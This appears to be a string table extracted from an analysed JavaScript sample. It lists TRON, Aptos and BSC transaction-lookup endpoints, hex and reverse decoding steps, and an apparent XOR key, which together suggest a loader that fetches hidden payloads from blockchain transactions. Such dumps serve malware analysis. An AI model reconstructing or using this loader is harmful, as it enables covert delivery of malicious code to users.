========== STRING TABLE ==========

[script] [0] = "r"
[script] [1] = "end"
[script] [2] = "error"
[script] [3] = "on"
[script] [4] = ""
[script] [5] = "data"
[script] [6] = "parse"
[script] [7] = "JSON"
[script] [8] = "get"
[script] [9] = "https"
[script] [10] = "Promise"
[script] [11] = "2.0"
[script] [12] = "stringify"
[script] [13] = "POST"
[script] [14] = "request"
[script] [15] = "write"
[script] [16] = "join"
[script] [17] = "reverse"
[script] [18] = "split"
[script] [19] = "utf8"
[script] [20] = "toString"
[script] [21] = "raw_data"
[script] [22] = "https://api.trongrid.io/v1/accounts/"
[script] [23] = "/transactions?only_confirmed=true&only_from=true&limit=1"
[script] [24] = "hex"
[script] [25] = "from"
[script] [26] = "Buffer"
[script] [27] = "arguments"
[script] [28] = "payload"
[script] [29] = "https://fullnode.mainnet.aptoslabs.com/v1/accounts/"
[script] [30] = "/transactions?limit=1"
[script] [31] = "?.?"
[script] [32] = "substring"
[script] [33] = "input"
[script] [34] = "result"
[script] [35] = "eth_getTransactionByHash"
[script] [36] = "bsc-dataseed.binance.org"
[script] [37] = "bsc-rpc.publicnode.com"
[script] [38] = "length"
[script] [39] = "charCodeAt"
[script] [40] = "fromCharCode"
[script] [41] = "String"
[script] [42] = "2[gWfGj;<:-93Z^C"
[script] [43] = "_t_1"
[script] [44] = "_t_2"
[script] 